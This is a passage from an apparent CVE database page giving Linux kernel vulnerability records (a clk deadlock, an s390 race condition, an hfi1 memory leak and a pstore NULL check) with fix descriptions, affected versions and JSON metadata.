          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: Get runtime PM before walking tree during disable_unused\n\nDoug reported [1] the following hung task:\n\n INFO: task swapper/0:1 blocked for more than 122 seconds.\n       Not tainted 5.15.149-21875-gf795ebc40eb8 #1\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:swapper/0       state:D stack:    0 pid:    1 ppid:     0 flags:0x00000008\n Call trace:\n  __switch_to+0xf4/0x1f4\n  __schedule+0x418/0xb80\n  schedule+0x5c/0x10c\n  rpm_resume+0xe0/0x52c\n  rpm_resume+0x178/0x52c\n  __pm_runtime_resume+0x58/0x98\n  clk_pm_runtime_get+0x30/0xb0\n  clk_disable_unused_subtree+0x58/0x208\n  clk_disable_unused_subtree+0x38/0x208\n  clk_disable_unused_subtree+0x38/0x208\n  clk_disable_unused_subtree+0x38/0x208\n  clk_disable_unused_subtree+0x38/0x208\n  clk_disable_unused+0x4c/0xe4\n  do_one_initcall+0xcc/0x2d8\n  do_initcall_level+0xa4/0x148\n  do_initcalls+0x5c/0x9c\n  do_basic_setup+0x24/0x30\n  kernel_init_freeable+0xec/0x164\n  kernel_init+0x28/0x120\n  ret_from_fork+0x10/0x20\n INFO: task kworker/u16:0:9 blocked for more than 122 seconds.\n       Not tainted 5.15.149-21875-gf795ebc40eb8 #1\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:kworker/u16:0   state:D stack:    0 pid:    9 ppid:     2 flags:0x00000008\n Workqueue: events_unbound deferred_probe_work_func\n Call trace:\n  __switch_to+0xf4/0x1f4\n  __schedule+0x418/0xb80\n  schedule+0x5c/0x10c\n  schedule_preempt_disabled+0x2c/0x48\n  __mutex_lock+0x238/0x488\n  __mutex_lock_slowpath+0x1c/0x28\n  mutex_lock+0x50/0x74\n  clk_prepare_lock+0x7c/0x9c\n  clk_core_prepare_lock+0x20/0x44\n  clk_prepare+0x24/0x30\n  clk_bulk_prepare+0x40/0xb0\n  mdss_runtime_resume+0x54/0x1c8\n  pm_generic_runtime_resume+0x30/0x44\n  __genpd_runtime_resume+0x68/0x7c\n  genpd_runtime_resume+0x108/0x1f4\n  __rpm_callback+0x84/0x144\n  rpm_callback+0x30/0x88\n  rpm_resume+0x1f4/0x52c\n  rpm_resume+0x178/0x52c\n  __pm_runtime_resume+0x58/0x98\n  __device_attach+0xe0/0x170\n  device_initial_probe+0x1c/0x28\n  bus_probe_device+0x3c/0x9c\n  device_add+0x644/0x814\n  mipi_dsi_device_register_full+0xe4/0x170\n  devm_mipi_dsi_device_register_full+0x28/0x70\n  ti_sn_bridge_probe+0x1dc/0x2c0\n  auxiliary_bus_probe+0x4c/0x94\n  really_probe+0xcc/0x2c8\n  __driver_probe_device+0xa8/0x130\n  driver_probe_device+0x48/0x110\n  __device_attach_driver+0xa4/0xcc\n  bus_for_each_drv+0x8c/0xd8\n  __device_attach+0xf8/0x170\n  device_initial_probe+0x1c/0x28\n  bus_probe_device+0x3c/0x9c\n  deferred_probe_work_func+0x9c/0xd8\n  process_one_work+0x148/0x518\n  worker_thread+0x138/0x350\n  kthread+0x138/0x1e0\n  ret_from_fork+0x10/0x20\n\nThe first thread is walking the clk tree and calling\nclk_pm_runtime_get() to power on devices required to read the clk\nhardware via struct clk_ops::is_enabled(). This thread holds the clk\nprepare_lock, and is trying to runtime PM resume a device, when it finds\nthat the device is in the process of resuming so the thread schedule()s\naway waiting for the device to finish resuming before continuing. The\nsecond thread is runtime PM resuming the same device, but the runtime\nresume callback is calling clk_prepare(), trying to grab the\nprepare_lock waiting on the first thread.\n\nThis is a classic ABBA deadlock. To properly fix the deadlock, we must\nnever runtime PM resume or suspend a device with the clk prepare_lock\nheld. Actually doing that is near impossible today because the global\nprepare_lock would have to be dropped in the middle of the tree, the\ndevice runtime PM resumed/suspended, and then the prepare_lock grabbed\nagain to ensure consistency of the clk tree topology. If anything\nchanges with the clk tree in the meantime, we\u0027ve lost and will need to\nstart the operation all over again.\n\nLuckily, most of the time we\u0027re simply incrementing or decrementing the\nruntime PM count on an active device, so we don\u0027t have the chance to\nschedule away with the prepare_lock held. Let\u0027s fix this immediate\nproblem that can be\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:57.231Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/253ab38d1ee652a596942156978a233970d185ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/4af115f1a20a3d9093586079206ee37c2ac55123"
        },
        {
          "url": "https://git.kernel.org/stable/c/a29ec0465dce0b871003698698ac6fa92c9a5034"
        },
        {
          "url": "https://git.kernel.org/stable/c/a424e713e0cc33d4b969cfda25b9f46df4d7b5bc"
        },
        {
          "url": "https://git.kernel.org/stable/c/60ff482c4205a5aac3b0595ab794cfd62295dab5"
        },
        {
          "url": "https://git.kernel.org/stable/c/115554862294397590088ba02f11f2aba6d5016c"
        },
        {
          "url": "https://git.kernel.org/stable/c/e581cf5d216289ef292d1a4036d53ce90e122469"
        }
      ],
      "title": "clk: Get runtime PM before walking tree during disable_unused",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27004",
    "datePublished": "2024-05-01T05:28:54.684Z",
    "dateReserved": "2024-02-19T14:20:24.207Z",
    "dateUpdated": "2025-11-04T17:16:29.861Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27009 (GCVE-0-2024-27009)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:16

Title

s390/cio: fix race condition during online processing

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/cio: fix race condition during online processing A race condition exists in ccw_device_set_online() that can cause the online process to fail, leaving the affected device in an inconsistent state. As a result, subsequent attempts to set that device online fail with return code ENODEV. The problem occurs when a path verification request arrives after a wait for final device state completed, but before the result state is evaluated. Fix this by ensuring that the CCW-device lock is held between determining final state and checking result state. Note that since: commit 2297791c92d0 ("s390/cio: dont unregister subchannel from child-drivers") path verification requests are much more likely to occur during boot, resulting in an increased chance of this race condition occurring.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3076b3c38a704e10d…
	https://git.kernel.org/stable/c/559f3a6333397ab6c…
	https://git.kernel.org/stable/c/2df56f4ea769ff81e…
	https://git.kernel.org/stable/c/a4234decd0fe42983…
	https://git.kernel.org/stable/c/2d8527f2f911fab84…

Impacted products

Vendor

Product

Version

Linux

Affected: 2297791c92d04a154ad29ba5a073f9f627982110 , < 3076b3c38a704e10df5e143c213653309d532538 (git)
Affected: 2297791c92d04a154ad29ba5a073f9f627982110 , < 559f3a6333397ab6cd4a696edd65a70b6be62c6e (git)
Affected: 2297791c92d04a154ad29ba5a073f9f627982110 , < 2df56f4ea769ff81e51bbb05699989603bde9c49 (git)
Affected: 2297791c92d04a154ad29ba5a073f9f627982110 , < a4234decd0fe429832ca81c4637be7248b88b49e (git)
Affected: 2297791c92d04a154ad29ba5a073f9f627982110 , < 2d8527f2f911fab84aec04df4788c0c23af3df48 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:16:50.377Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3076b3c38a704e10df5e143c213653309d532538"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/559f3a6333397ab6cd4a696edd65a70b6be62c6e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2df56f4ea769ff81e51bbb05699989603bde9c49"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a4234decd0fe429832ca81c4637be7248b88b49e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d8527f2f911fab84aec04df4788c0c23af3df48"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27009",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:44:43.675046Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:38.137Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/cio/device.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3076b3c38a704e10df5e143c213653309d532538",
              "status": "affected",
              "version": "2297791c92d04a154ad29ba5a073f9f627982110",
              "versionType": "git"
            },
            {
              "lessThan": "559f3a6333397ab6cd4a696edd65a70b6be62c6e",
              "status": "affected",
              "version": "2297791c92d04a154ad29ba5a073f9f627982110",
              "versionType": "git"
            },
            {
              "lessThan": "2df56f4ea769ff81e51bbb05699989603bde9c49",
              "status": "affected",
              "version": "2297791c92d04a154ad29ba5a073f9f627982110",
              "versionType": "git"
            },
            {
              "lessThan": "a4234decd0fe429832ca81c4637be7248b88b49e",
              "status": "affected",
              "version": "2297791c92d04a154ad29ba5a073f9f627982110",
              "versionType": "git"
            },
            {
              "lessThan": "2d8527f2f911fab84aec04df4788c0c23af3df48",
              "status": "affected",
              "version": "2297791c92d04a154ad29ba5a073f9f627982110",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/cio/device.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/cio: fix race condition during online processing\n\nA race condition exists in ccw_device_set_online() that can cause the\nonline process to fail, leaving the affected device in an inconsistent\nstate. As a result, subsequent attempts to set that device online fail\nwith return code ENODEV.\n\nThe problem occurs when a path verification request arrives after\na wait for final device state completed, but before the result state\nis evaluated.\n\nFix this by ensuring that the CCW-device lock is held between\ndetermining final state and checking result state.\n\nNote that since:\n\ncommit 2297791c92d0 (\"s390/cio: dont unregister subchannel from child-drivers\")\n\npath verification requests are much more likely to occur during boot,\nresulting in an increased chance of this race condition occurring."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:04.984Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3076b3c38a704e10df5e143c213653309d532538"
        },
        {
          "url": "https://git.kernel.org/stable/c/559f3a6333397ab6cd4a696edd65a70b6be62c6e"
        },
        {
          "url": "https://git.kernel.org/stable/c/2df56f4ea769ff81e51bbb05699989603bde9c49"
        },
        {
          "url": "https://git.kernel.org/stable/c/a4234decd0fe429832ca81c4637be7248b88b49e"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d8527f2f911fab84aec04df4788c0c23af3df48"
        }
      ],
      "title": "s390/cio: fix race condition during online processing",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27009",
    "datePublished": "2024-05-01T05:29:18.671Z",
    "dateReserved": "2024-02-19T14:20:24.208Z",
    "dateUpdated": "2025-11-04T17:16:50.377Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26839 (GCVE-0-2024-26839)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:10 – Updated: 2025-05-04 08:57

Title

IB/hfi1: Fix a memleak in init_credit_return

Summary

In the Linux kernel, the following vulnerability has been resolved: IB/hfi1: Fix a memleak in init_credit_return When dma_alloc_coherent fails to allocate dd->cr_base[i].va, init_credit_return should deallocate dd->cr_base and dd->cr_base[i] that allocated before. Or those resources would be never freed and a memleak is triggered.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2e4f9f20b32658ef3…
	https://git.kernel.org/stable/c/cecfb90cf71d91e9e…
	https://git.kernel.org/stable/c/3fa240bb6b2dbb3e7…
	https://git.kernel.org/stable/c/52de5805c14713720…
	https://git.kernel.org/stable/c/f0d857ce31a6bc7a8…
	https://git.kernel.org/stable/c/b41d0ade0398007fb…
	https://git.kernel.org/stable/c/8412c86e89cc78d8b…
	https://git.kernel.org/stable/c/809aa64ebff51eb17…

Impacted products

Vendor

Product

Version

Linux

Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < 2e4f9f20b32658ef3724aa46f7aef4908d2609e3 (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < cecfb90cf71d91e9efebd68b9e9b84661b277cc8 (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < 3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7 (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < 52de5805c147137205662af89ed7e083d656ae25 (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < f0d857ce31a6bc7a82afcdbadb8f7417d482604b (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < b41d0ade0398007fb746213f09903d52a920e896 (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < 8412c86e89cc78d8b513cb25cf2157a2adf3670a (git)
Affected: 7724105686e718ac476a6ad3304fea2fbcfcffde , < 809aa64ebff51eb170ee31a95f83b2d21efa32e2 (git)

Linux

Affected: 4.3
Unaffected: 0 , < 4.3 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26839",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T19:24:08.338788Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T19:24:16.847Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.692Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e4f9f20b32658ef3724aa46f7aef4908d2609e3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cecfb90cf71d91e9efebd68b9e9b84661b277cc8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52de5805c147137205662af89ed7e083d656ae25"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f0d857ce31a6bc7a82afcdbadb8f7417d482604b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b41d0ade0398007fb746213f09903d52a920e896"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8412c86e89cc78d8b513cb25cf2157a2adf3670a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/809aa64ebff51eb170ee31a95f83b2d21efa32e2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/hfi1/pio.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2e4f9f20b32658ef3724aa46f7aef4908d2609e3",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "cecfb90cf71d91e9efebd68b9e9b84661b277cc8",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "52de5805c147137205662af89ed7e083d656ae25",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "f0d857ce31a6bc7a82afcdbadb8f7417d482604b",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "b41d0ade0398007fb746213f09903d52a920e896",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "8412c86e89cc78d8b513cb25cf2157a2adf3670a",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            },
            {
              "lessThan": "809aa64ebff51eb170ee31a95f83b2d21efa32e2",
              "status": "affected",
              "version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/hfi1/pio.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.3"
            },
            {
              "lessThan": "4.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/hfi1: Fix a memleak in init_credit_return\n\nWhen dma_alloc_coherent fails to allocate dd-\u003ecr_base[i].va,\ninit_credit_return should deallocate dd-\u003ecr_base and\ndd-\u003ecr_base[i] that allocated before. Or those resources\nwould be never freed and a memleak is triggered."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:57:41.410Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2e4f9f20b32658ef3724aa46f7aef4908d2609e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/cecfb90cf71d91e9efebd68b9e9b84661b277cc8"
        },
        {
          "url": "https://git.kernel.org/stable/c/3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7"
        },
        {
          "url": "https://git.kernel.org/stable/c/52de5805c147137205662af89ed7e083d656ae25"
        },
        {
          "url": "https://git.kernel.org/stable/c/f0d857ce31a6bc7a82afcdbadb8f7417d482604b"
        },
        {
          "url": "https://git.kernel.org/stable/c/b41d0ade0398007fb746213f09903d52a920e896"
        },
        {
          "url": "https://git.kernel.org/stable/c/8412c86e89cc78d8b513cb25cf2157a2adf3670a"
        },
        {
          "url": "https://git.kernel.org/stable/c/809aa64ebff51eb170ee31a95f83b2d21efa32e2"
        }
      ],
      "title": "IB/hfi1: Fix a memleak in init_credit_return",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26839",
    "datePublished": "2024-04-17T10:10:05.536Z",
    "dateReserved": "2024-02-19T14:20:24.182Z",
    "dateUpdated": "2025-05-04T08:57:41.410Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35940 (GCVE-0-2024-35940)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:35

Title

pstore/zone: Add a null pointer check to the psz_kmsg_read

Summary

In the Linux kernel, the following vulnerability has been resolved: pstore/zone: Add a null pointer check to the psz_kmsg_read kasprintf() returns a pointer to dynamically allocated memory which can be NULL upon failure. Ensure the allocation was successful by checking the pointer validity.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/98e2b97acb875d65b…
	https://git.kernel.org/stable/c/0ff96ec22a84d80a1…
	https://git.kernel.org/stable/c/635594cca59f9d7a8…
	https://git.kernel.org/stable/c/ec7256887d072f98c…
	https://git.kernel.org/stable/c/6f9f2e498eae7897b…
	https://git.kernel.org/stable/c/98bc7e26e14fbb26a…

Impacted products

Vendor

Product

Version

Linux

Affected: d26c3321fe18dc74517dc1f518d584aa33b0a851 , < 98e2b97acb875d65bdfc75fc408e67975cef3041 (git)
Affected: d26c3321fe18dc74517dc1f518d584aa33b0a851 , < 0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb (git)
Affected: d26c3321fe18dc74517dc1f518d584aa33b0a851 , < 635594cca59f9d7a8e96187600c34facb8bc0682 (git)
Affected: d26c3321fe18dc74517dc1f518d584aa33b0a851 , < ec7256887d072f98c42cdbef4dcc80ddf84c7a70 (git)
Affected: d26c3321fe18dc74517dc1f518d584aa33b0a851 , < 6f9f2e498eae7897ba5d3e33908917f68ff4abcc (git)
Affected: d26c3321fe18dc74517dc1f518d584aa33b0a851 , < 98bc7e26e14fbb26a6abf97603d59532475e97f8 (git)

Linux

Affected: 5.8
Unaffected: 0 , < 5.8 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.063Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98e2b97acb875d65bdfc75fc408e67975cef3041"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
